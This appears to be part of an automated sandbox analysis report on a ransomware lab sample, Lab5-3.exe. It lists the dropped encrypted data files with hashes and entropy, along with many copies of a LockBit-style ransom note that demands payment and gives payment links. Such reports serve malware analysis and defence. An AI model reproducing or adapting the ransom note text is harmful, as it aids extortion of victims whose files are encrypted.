                                                                                                          Preview::...D..$#E.g.z.N.......D.r.......3...+...b.B...+^..2<....W....E...UR../.!.`e..'..h.1....0....|..........2...V......g.D....`..Z.....j6....%.F....\..S..x.-..T...O..7....0L...!.8..:@.w.V.W".vt...~...XgY7J.&L.r6.tV$.....T.......=.i...=..m$>.%.s...q.....?.....&.f.M.*.-}.A.p?oD..p....e..4U..I.'E..............H[........P.kDO....v...l.:....r..dA.j...3.u.m..m...wk#!|R.-..KuB..e..=;.<.4..k..2.....Y..;f+D..._QH.L..9.io..f...p...G..q!.....2.&...S.........A.aRa`....B.&".qr...WJJr....k.0..`mj..K.......S....I...Fx.+.)..%..K......S.McM3...R..g..J.....v.....:.......C..).j#:\9....S%/e.B.).(T.F..#x....-f.....c9....W.y.u.1..pYMM...c..d...`..c!+..../.Z..OC[-..=ip.p..Q..z6.+.........7..l.X>...I[.F...ri].u...i0.D..[...@.,Lo.CJ ..w..[sq.6x..NI..9..I.%R..}.bk.....^tD......F%..k.<...1.....TG.#...C.U.9...?..."....>...H/....WP.<...........:..k....%..;..%....y..o?t..p.C.}8.m...!.}.....,~....+....5..@...@&R.+...H.....4Bl..y.].X.P..0~?....S...>.9....:.YM.....:".*
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2592
                                                                                                          Entropy (8bit):7.919337534439335
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:RXSVS3XTITV7klNhHfUTid3hBaUoSGFcmeykEdEElU92i:RXrnTIh7kSGx0uKeY2ElUJ
                                                                                                          MD5:B64B6C1B907B89A43B62B0BCCFF55949
                                                                                                          SHA1:687258ED0CCE4B20C2DA1476668A3C81DDC41A86
                                                                                                          SHA-256:648660D7F086DBF790522C8E47EF3013827ECF43CEA8F0FDB5BF208AD9E46B83
                                                                                                          SHA-512:614FDDE8FA90EAD8B83EC3A184560D0ACFF20C799FB911A410349376C6B9BA4C8C95A16FF65DCF395DA83E30F62B55B1F8E5442CD842F0F5C4D5B55977C67547
                                                                                                          Malicious:false
                                                                                                          Preview:+~..b...c......o..#....{.fS$.....{...ug.....T....*..8.BZW'f.%...+....i....o.....V.@I.xb..u......@v,g.AL/!\%...1...h"$.."B.m_.._j....R...........]b.I.9q].>S.....ym.....W...9jP...Zj9A.....&B..x~.....e.....{..."...a......_bL4...t..!..J.O_"...1..[..j...U...2{-....C.^he..t!1z..E.[b&.5....1Gh..ID..V[.O.u...?M...1.r..%.gF...p.8..9...9.B...(.......GW..F.9...`.7.Z..&....)...-.otp....7G.....S.......A|.^-.R.'(..5q1.A..G.WY.S.. ..Z.#..Wj.[.rW.xNEPI...%K.#..(......Fv...XE5.....`..|m.@............"?~CPh...i...`.6P.;)....."........h*.*..ts.l"/.^,.R..#9..A9....-..2..,.s1j.},.^.....,L....HG.8...oU.K..../.`.e_....l. O.e2.`.|%Hc!%......Y6.H.O..Y.1..r..r.....Q...BJ.m..[~.E.3....m....zI..&..F&.....{H.x.......[....{..T..=Z.......<.....e..W..B.a..B.%.N..b~.......c%.B_..L.[.......7..'6...P....1o.O$.0...w^.........\.{..&..B.9{[f....+-U....wA......p....?.l-.......|.U....'..kf..e.?o.x......N./.H..Io9].....8TSf...I...tdOs...n....f.|g.p.?...a A..l
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):11040
                                                                                                          Entropy (8bit):7.98288442810556
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:Rix4LHb5ZlbABVJ1/zgUYt0fLat8WeyqaqaA4ZV0Cb:oxWvlboJVzBjKHeyqELtb
                                                                                                          MD5:7AB6B839C01FF7ED277E866B87C76602
                                                                                                          SHA1:A676CB5E0293039C1B9B5DD15774FE0330358B61
                                                                                                          SHA-256:3B8C293AABBE0FDCA0823B4A720DC08D47FC2DADC925F76DE3C8FF5310493F22
                                                                                                          SHA-512:9F296AB92352C7B6A178C0352365D3BCD9B3F9268867AEF2BD50D87CFEA02240F17434843721205DE9A904F6D780268A2590CA0836094A6B13E5AB492A47F71C
                                                                                                          Malicious:false
                                                                                                          Preview:...+^..#./P.{.......)..@.O..x.;\..c.1&..KND..{...T.g..n.J.#..E.'.p.....9.9.f.3d..l...c0.@@.A......"q..}8#..X.@4.>.9..o.. .).R..u6....{#I.F..UO(....I...o....^{.nU...k*F.=d+.=.cn.7,fx...C....u...K.dw]?.5`.......&..i.:[.p..&.....@..0..e`b.(...c._.......4.(.).E...q..".Pm$..j..s7uT........i..<.:/.W.>...R..."?h...?..T{...s"wh..e_.1 .9.%..ir......q9.....:.q.9[.z5p.a.......@.."....o(~..v*....Hal..Jj..T|..!..i..e2..>@...:@...P.L.x.5....+.......wL.8^DF.Z.......20Hz......|J.v$.....L..okE...qU.6.v..!.0........+..YZn%gi....Lt.o.d.z.y..R.3f..5..gN....q......B;.2.....X..}[QI+....C_.>..D..].....*..y@b.j.\oIB.\.gP..|a../.^..|.!.C(]8T........._......>...&.-.r.@U...=...G.8..6e.j...W.j.............C......Fx.j......~3.dUf.o....1....}.).I$z.g..W[L.fW.I.P.......)..A.....jW]m.........n....."....p.;....p.x.c.2.Q3Z=u..:...;..x......^..............F.J ..%;..........T..X........Tz..h0nL.O&^.`..Y+./q.d.%it.....>v.......cbC..h...jP..B...V.h2.E..H..<.......+."
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):10816
                                                                                                          Entropy (8bit):7.984760505136161
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:efcCKueAOuF61USfyusu/JrQQ0ftQn6/mEVSlFUXnQQ0Cb:tBAN2U5qSQt6/3MUX/tb
                                                                                                          MD5:F6646FBECC47BA0582583C824CBA808A
                                                                                                          SHA1:87DF2DCA69286AE914AEDBBBD75C32E015031EFA
                                                                                                          SHA-256:8556708571EDA86699E0D58DA1187CBA063BFD231200A0EEA3104695A4B2F3EC
                                                                                                          SHA-512:E995192775EF6B6A675973732C3D13846280B3DF4E69547DBE61418BD25DC6A5A8CFE5570D07F9FC218C5C861D3FB3E0F622E12AAE59BDD46192977CE13784F6
                                                                                                          Malicious:false
                                                                                                          Preview:H.......ju...._G.....)YE............v'm...m...Ad....N....S.Y...YRn..!....`...G)......~..z..ZyE...|.$.?4..ZXVl....X.....#.|.C..Z(......#Q.v.H.I..'.|7^b..&..%.=..b@... [1K.|;u$.`..S.......^...;..P.q.'.H.N...2.q..,..............c..........Q..je..!.i..........B......[..Nsp..L.G[s.:kG.#.....{.a2L.DW ..t....3.....xG.....?..z*_I.z..\.8S.a.-M..c&.b.'.[u...h.+(..d..W....Q....$B.fC|fo..f 6r...yT.{....b..N....:rI.q..8.p":..?./u5.FWP#j....p...;....*....(.B.3eJ.S..0Hh= ....aHQ`,.kyPK....N..Tc....#..C.5..h.{.H..%Xw../..3.2....|.O!i.X.vO._....S.em@%.N.....$&.p!...G......rI......!a.vA.....'=6.. .=..*..@j.X...rk...@.*..A*Q..#z ....Zl,....;N.C....(....)eq..@G.3..O...%...!.......Ov.1=.Ng4VC2..d&o.>w...[=}....{e.<.ZH..8`.m.[...R[........#.....*8uk9...M..~j........Z....R......G.zS.VZ.....U..p.Z.'y~[....%.u..."'[/[..z...{*...R.!L.Z0.=+.%7.....x......A....U...E...z+?.&!.8.Y...V.+.3z.:....P..$.....RD....+."WLKT..1.........k..+.^.R...."..a..".;%:.Q..(..Y.....
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):10240
                                                                                                          Entropy (8bit):7.983519725897094
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:YKspKydCJRqN/lbP6tvfJak6S+sNO288mvlrqZUpf0C8TBXPsB2GVitE0Cb:cC4gtJatSPo8mvRlfn8T5kj8Etb
                                                                                                          MD5:87DAEC024B62BD6A60F3E3F1C6D4DBBE
                                                                                                          SHA1:16FC60CC229F0FFACAAC911A2660A5DE2A5B468A
                                                                                                          SHA-256:3D7FB42D83E6060E63B66CB418FC2A0DCE69FF8B149D6239FAD4367B805927B6
                                                                                                          SHA-512:881C5A63ECEC43BA708A31F310255FFC8ECD449E100E7161701395C45F140A4A12CB364CBF851CC6A059F3F494B5503370607FAE1D938FB3404CC062BC5FF51A
                                                                                                          Malicious:false
                                                                                                          Preview:.%{.'k.Z.h......w..X.U.C..+F....L...-s....S.%.......\.,....:.. UA.c..m1...`.`d....7.t.Y.th..R.X....:N...S..q..T..kodW.Dd..7.,.... .......V...K....H..5s..-...H...!.rp..e.{....jb..*..../cO.w?..h..1/B........47...k...*.76._..S...M{..`...ul@..3LJ4.x....l\...,p.l./N.........oE=..........!.G-~....\Q$t.<i.t..8..L..v......+..}.}..:3.....~y...u4.2I....M...<.rG{.*.d.....-u-.c.L.%.....z.....a....<.0L?...aH....~%.w..X..v..`=#k....{..3./_..Q*..8:h....iA&.'.!(.|....v...^j.S...lWw+-.1e\.t..J.].?..Q...7m.p5Dj?....u|...#.N..5...U2&. ...)..c....+...:....;!.TN^.`......U......M...7..P......2....)............s.I^..X)V%..<..R..........rV*....../..|..2..8g5.-._.K.V..f.l./..V.w...1..#........'&>M?.%W.m..j`.K...j.....HF.m.}..]u....k....>......L...n.0....a..P...F5.a3..B!ne...9....;....g.R.....S....43......i9.m]...C`(If._Gy.T.....<X8.P;..X...._...8.%U....{..P..3..3}..:LQ"......(...t..c..m..](v....KN.b.(*.3..'.u.....M..0.J.v|.*......T...E..[..A.L'..;/o_+R>!.d..L.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):11088
                                                                                                          Entropy (8bit):7.984290318717328
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:1rsKPawgNX5uARHE6oWqHfz7pHvJaJ5AsnSUmgJ6BR8ZJg0Cb:CIrgNXoCCWwxJabAimgYR87gtb
                                                                                                          MD5:18D82EC5B8F142F254F4E2369A8A7DCE
                                                                                                          SHA1:491FF5BA5FE5A59DE774FDDEE1077B03D641E161
                                                                                                          SHA-256:DB6E8FEC02364B7A7ABF53D985CA959A6259A9B06A46C9F1690CE232349D66E0
                                                                                                          SHA-512:066031BCC00EECD4FD8BCD45690B0BD14FE5E7C1A68589B2F814F4FFC10A945B3A88FDE49A74CF7574275BA00F2FE5D644069F2DD9F69B27944D393383E9355E
                                                                                                          Malicious:false
                                                                                                          Preview:.2...mM..C.......\U..n.?..\.......A..A..F.;........6.z..@m|.....e..J.....d.y.e...e...........<...hy.....=..n.O.FI.f...~.. R.......).. ?%cZ>BM5....(..D`....4...4-b1..j~.o...=S........8b...;........V..%H.6..^.......p7....C......i'.^.....6.E...o..B.Y.....?'..q:6qj..#I.%.!........|A.....d;...9\D..U>.J:...[%.&.c.4^,.^x.....H...4.jUX../....RRy......:UB`V..\.j..pR.XAK.`..`.P..w..R.\..=@H....%......g...d...k.|.hC..[X.t..i..&..g[...&._.=..;.7.Q..Dp..-.h.C.m...I.......B.......).R........1..cD...p......&Q....;.HK=.e2...x...+..E.).y...p>.`[)e..U.S ...ZiX....t..$.:&.6X:X.,.:.......F.`........(..1c....02...7k......,.._I......6.2..u#.M....L.M<.*./.G..6..P..T:..P.....Nv....-T.}k..SL..H.&.a~......M.L?P...0q.y.#l.3...Q9..oG.8..O.7.....+H....M....B.a\f..t.aV.........T..Z.k..S.l&..d......B.pq]..MU.l...G.....mn...'.E{.#...)\...!..u .M.t....#..*r.N..\.......3.m...8...9JA....:-x..Y*.=u.1.._2.v..o....T....D*.*Kcx...r.fWi "..m.r.^\K7I.>.i..{..A(.J.o&`.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):9888
                                                                                                          Entropy (8bit):7.984547075684047
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:Xk4MHUex8yEFadT675CVfYWn/S1xssP2QIwHG4tB40Cb:XNWUExELFEYecVeQIwHGmB4tb
                                                                                                          MD5:391D8E38E82C897F88BBDF5F158F0C80
                                                                                                          SHA1:6B8CFF3FD38420006E94AFB21AFE97BEE9D5DBAD
                                                                                                          SHA-256:BD4E2363B56BA298988E24459E6F45255AEA014C18F68F7E6DF6EB0781FD3D40
                                                                                                          SHA-512:CAEAF3670D5459877D4B15BFB8DAEC0CD4477B5057D459CC9810F0463C50254E6A11FD301309249D4C940E2BD769EB20BFCC0275277D08A8D6C9B87C833EDB2A
                                                                                                          Malicious:false
                                                                                                          Preview:.hB/;-7.BMB.b.M..-..=y..g..'.C.@.$..v.@c*.o....F.KXN.w.fS!...]P.w&.b..b.5....I8kyj.......o....`...g:K...i.....#A..........Z...Q...vP.CI.T.!...\.#.O.HP.s...W..w..D&..QJX.-l,.[..D................_..}..%o(..f....*..7m...r0^E.K9.i..}jt!.6..{..-dCd.&.t..;..Y/.......!.p.3....B....\...R.|R...u..QY.o!...0..j.].d.M.._.:.v.x-..dD...E0.I@.[).........E...oy..W.L.G".l;.oZ..?.}l...~w..N..I...mW$..n||6P...g@D?L....n....CI1..........9-...r...VC.....2....6..kWl.}-..M:lQ.?j..fC..h.....VI.L..JH...uiL\...r).J...E.G.z.aV..S).&aY....^$.m.....wLo.T`>w.Y.{*....e.6..JW.8}.G...=.@.X...8+1..Y.b?=.......n{.E.7. aB"...3....7...7..^._.....T.(1"1 .N.@.k...bX.........JE.F..R.\..4..-.SC.".D..^..Q..).o.0Y..Y.P^7o;..z. ..8\.....\....0.w.*..i..t5.Z.C..3w.....|.!..5.G.!.;7s&W...!...$..X..<~.v.)...........Y$.H_.....|yJ.]...y...}.......].%..H..n3..g....N;H..2...,.Z.^.5fu...Y.>..1j.S...U',;O...?.7tW.C....!..k.^...ON..!.`x..l.:..r."w..... R..g...b...W^.....6,......JkFkEEkj$^.>...~
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):8416
                                                                                                          Entropy (8bit):7.978924697426764
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:r71Ioru9K34PU54SOqN8LPqv9WMsSylfSam0q0bvxK0Cb:rZPru9K34PM4SOqGzq1WMsSEfSamcdKZ
                                                                                                          MD5:7EF32D934B7D1EAE4B1EF89658B31E2E
                                                                                                          SHA1:9A1ED954DF405CE5B74C933F90B3EEAA10F39C64
                                                                                                          SHA-256:E92940F31259082FCB5DFF1A2858383F7A6B0EC26169BB2A1EBE419F46D76BE6
                                                                                                          SHA-512:DAF95DE57951D673E792A4648E2FC2346CD9FB8A4A92096EDCCBC1D5B6AD6346C3910B53ABBF5A36942CFCF0DB2558ECD4773FFA27EB7A527C499937A5F692B7
                                                                                                          Malicious:false
                                                                                                          Preview:B>.....a|..t.0..}...N..x.....yf:..,.....4'S.K....~..:.1..>..F.I.|FMn.8.d_....+E..'C...E/........d..G....%...G.,H..X:_.........`......c..\G..63.Xt+s...=>..(\.?ldz.w....N}Y....".O%}..[mX.sYK....~.....p...Y._.r.h..Nu...}:..T..&..D?..{z.P^.~mZV...py..D..[-eY6^U..L.?K.>...3....A..9.R.>.hx.3....... y.v.5uW>....{....t....g...3. P.^\...a......] 24P.R..g>".....vh...[..."2......}..m...rn[.J;.J..#.X$.E.>.M..D7c9......+.(rw.....>.Wx.......,....i....U'O......e..rGn58N......9.}...F..).l...|Md[.B]...A..T.P.<.Qmi..j..D;m...@.2.....!]....<4R..A"......-.9.&..Q.G...z...Hb.U..'zI)......-.....wF..h..O...Z..^.z...?CE.Q.[.......#...L\eTG.......l.STY.."..g...P.:...>.....Z...........*.........._:.X.....}g..K.A.;`....K%........k....W!_.....v.`1WK.W..4..}..ae...Kx.s...e.A.*.i".a?N.$.....n...O).*. ......$..X...k.....m.U9.....iz...P.1F.....iu. ....nYo....-..^6u...Zv...9.....D...;..Ytr.L/.....A.\.-S..9.Y.DI ..e..9,...:.S..E......po..Q}R......}...-...VH..X..b..g`...4.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
